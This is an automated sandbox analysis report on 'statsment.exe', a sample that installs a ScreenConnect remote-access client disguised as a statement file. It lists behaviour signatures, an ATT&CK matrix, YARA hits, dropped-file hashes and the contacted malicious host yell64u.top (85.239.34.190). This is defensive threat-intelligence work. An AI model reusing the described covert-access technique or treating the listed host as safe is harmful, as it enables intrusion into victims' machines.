                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B3F3642 CreateNamedPipeW,9_2_00007FFD9B3F3642
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_013F4D30 RtlGetVersion,7_2_013F4D30
                              Source: C:\Users\user\Desktop\statsment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                              Source: Yara matchFile source: statsment.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.2.statsment.exe.5430000.9.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 8.0.ScreenConnect.WindowsClient.exe.ad0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 8.2.ScreenConnect.WindowsClient.exe.2e4fa20.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.statsment.exe.5430000.9.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.statsment.exe.305db8.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.statsment.exe.2dc3d8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.statsment.exe.2563d8.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.2a2fa60.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.statsment.exe.240000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.1716747544.0000000005430000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000008.00000002.2960693212.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1698483119.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: statsment.exe PID: 7676, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7872, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 8112, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7344, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Config.Msi\59d159.rbs, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSID418.tmp, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Replication Through Removable Media
                              31
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              OS Credential Dumping11
                              Peripheral Device Discovery
                              Remote Services11
                              Archive Collected Data
                              2
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Native API
                              1
                              DLL Search Order Hijacking
                              1
                              DLL Search Order Hijacking
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              File and Directory Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter
                              1
                              Component Object Model Hijacking
                              1
                              Component Object Model Hijacking
                              1
                              Obfuscated Files or Information
                              Security Account Manager45
                              System Information Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron2
                              Windows Service
                              2
                              Windows Service
                              1
                              Software Packing
                              NTDS21
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture1
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd1
                              Bootkit
                              13
                              Process Injection
                              1
                              DLL Side-Loading
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              DLL Search Order Hijacking
                              Cached Domain Credentials51
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              File Deletion
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                              Masquerading
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
                              Virtualization/Sandbox Evasion
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                              Process Injection
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                              Hidden Users
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                              Bootkit
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Rundll32
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574188 Sample: statsment.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 48 55 yell64u.top 2->55 61 Multi AV Scanner detection for submitted file 2->61 63 .NET source code contains potential unpacker 2->63 65 .NET source code references suspicious native API functions 2->65 67 5 other signatures 2->67 8 msiexec.exe 94 51 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 statsment.exe 5 2->15         started        signatures3 process4 dnsIp5 35 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->35 dropped 37 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->37 dropped 39 C:\...\ScreenConnect.ClientService.exe, PE32 8->39 dropped 43 10 other files (1 malicious) 8->43 dropped 73 Enables network access during safeboot for specific services 8->73 75 Modifies security policies related information 8->75 17 msiexec.exe 8->17         started        19 msiexec.exe 1 8->19         started        21 msiexec.exe 8->21         started        57 yell64u.top 85.239.34.190, 49731, 8880 RAINBOW-HKRainbownetworklimitedHK Russian Federation 12->57 77 Reads the Security eventlog 12->77 79 Reads the System eventlog 12->79 23 ScreenConnect.WindowsClient.exe 3 12->23         started        26 ScreenConnect.WindowsClient.exe 2 12->26         started        41 C:\Users\user\AppData\...\statsment.exe.log, ASCII 15->41 dropped 81 Contains functionality to hide user accounts 15->81 28 msiexec.exe 6 15->28         started        file6 signatures7 process8 file9 31 rundll32.exe 11 17->31         started        69 Creates files in the system32 config directory 23->69 71 Contains functionality to hide user accounts 23->71 45 C:\Users\user\AppData\Local\...\MSICAFF.tmp, PE32 28->45 dropped signatures10 process11 file12 47 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 31->47 dropped 49 C:\...\ScreenConnect.InstallerActions.dll, PE32 31->49 dropped 51 C:\Users\user\...\ScreenConnect.Core.dll, PE32 31->51 dropped 53 4 other files (none is malicious) 31->53 dropped 59 Contains functionality to hide user accounts 31->59 signatures13

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              statsment.exe28%VirustotalBrowse
                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe3%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Windows\Installer\MSID438.tmp0%ReversingLabs
                              C:\Windows\Installer\MSID756.tmp0%ReversingLabs
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              yell64u.top3%VirustotalBrowse
                              No Antivirus matches
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              yell64u.top
                              85.239.34.190
                              truetrueunknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://wixtoolset.org/releases/rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1712025636.00000000049B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                high
                                http://wixtoolset.org/news/rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1712025636.00000000049B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000007.00000002.2963863424.0000000001D5A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1712025636.00000000049B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                      high
                                      https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.2.drfalse
                                        high
                                        https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.2.drfalse
                                          high
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          85.239.34.190
                                          yell64u.topRussian Federation
                                          134121RAINBOW-HKRainbownetworklimitedHKtrue
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1574188
                                          Start date and time:2024-12-13 03:12:07 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 11s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:14
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:statsment.exe
                                          Detection:MAL
                                          Classification:mal48.evad.winEXE@17/56@1/1
                                          EGA Information:
                                          • Successful, ratio: 60%
                                          HCA Information:
                                          • Successful, ratio: 66%
                                          • Number of executed functions: 337
                                          • Number of non-executed functions: 5
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target rundll32.exe, PID 7872 because it is empty
                                          • Execution Graph export aborted for target statsment.exe, PID 7676 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                          No simulations
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          85.239.34.190setup.msiGet hashmaliciousScreenConnect ToolBrowse
                                            statments.exeGet hashmaliciousScreenConnect ToolBrowse
                                              sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                yell64u.topsetup.msiGet hashmaliciousScreenConnect ToolBrowse
                                                • 85.239.34.190
                                                statments.exeGet hashmaliciousScreenConnect ToolBrowse
                                                • 85.239.34.190
                                                sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                • 85.239.34.190
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                RAINBOW-HKRainbownetworklimitedHKspc.elfGet hashmaliciousUnknownBrowse
                                                • 85.239.34.134
                                                sh4.elfGet hashmaliciousUnknownBrowse
                                                • 85.239.34.134
                                                m68k.elfGet hashmaliciousUnknownBrowse
                                                • 85.239.34.134
                                                3d#U0438.htaGet hashmaliciousUnknownBrowse
                                                • 85.239.52.118
                                                m68k.elfGet hashmaliciousMiraiBrowse
                                                • 85.239.34.134
                                                sh4.elfGet hashmaliciousMiraiBrowse
                                                • 85.239.34.134
                                                spc.elfGet hashmaliciousMiraiBrowse
                                                • 85.239.34.134
                                                x86.elfGet hashmaliciousMiraiBrowse
                                                • 85.239.34.134
                                                mips.elfGet hashmaliciousUnknownBrowse
                                                • 85.239.34.134
                                                558s2.exeGet hashmaliciousRevengeRATBrowse
                                                • 102.165.46.145
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dllhttps://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                  https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                    file.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      setup.msiGet hashmaliciousScreenConnect ToolBrowse
                                                        monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                statments.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                  Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):219646
                                                                    Entropy (8bit):6.581406265744191
                                                                    Encrypted:false
                                                                    SSDEEP:3072:uZ9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG1:uZuH2aCGw1ST1wQLdqv1
                                                                    MD5:C920508A10FD63B358772F519AEFC6AB
                                                                    SHA1:EC66470AEA3671F430776A87BC237D3E484F1702
                                                                    SHA-256:9DE8B412D0645EBAF18B9150416085E0373C8C51588D365A89897D2344EE32F1
                                                                    SHA-512:AF1A3D7EBF344DB441167ED2AE466F224D3520118217DFE4296B1BE092C029715099C605A0315BCB4EC27B76399FB9578D1758BFB1955B98621C5954802E43F2
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\59d159.rbs, Author: Joe Security
                                                                    Preview:...@IXOS.@.....@...Y.@.....@.....@.....@.....@.....@......&.{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}&.{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}.@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}&.{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}.@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}&.{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}.@......&.{E2565D0B-BCDD-C1A1-A2A2-7660FC61A23D}&.{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}.@......&.{A9BEA7A3-6285-A159-CBF3-596C269E6678}&.{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}.@......&.{567A6AC5-C59B-6D1E-4D5E-D3E6B358A6AB}&.{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}.@....
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):652
                                                                    Entropy (8bit):4.646296001566109
                                                                    Encrypted:false
                                                                    SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
                                                                    MD5:8B45555EF2300160892C25F453098AA4
                                                                    SHA1:0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
                                                                    SHA-256:75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
                                                                    SHA-512:F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
                                                                    Malicious:false
                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.F...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.t.....Support..Support.2Software is Updating.Do not turn off your computer.,Not enough data receiving from host computer..Removed
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):21018
                                                                    Entropy (8bit):7.841465962209068
                                                                    Encrypted:false
                                                                    SSDEEP:384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
                                                                    MD5:EF6DBD4F9C3BB57F1A2C4AF2847D8C54
                                                                    SHA1:41D9329C5719467E8AE8777C2F38DE39F02F6AE4
                                                                    SHA-256:0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
                                                                    SHA-512:5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
                                                                    Malicious:false
                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2..;..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..E..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.xO.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):50133
                                                                    Entropy (8bit):4.759054454534641
                                                                    Encrypted:false
                                                                    SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                    MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                    SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                    SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                    SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                    Malicious:false
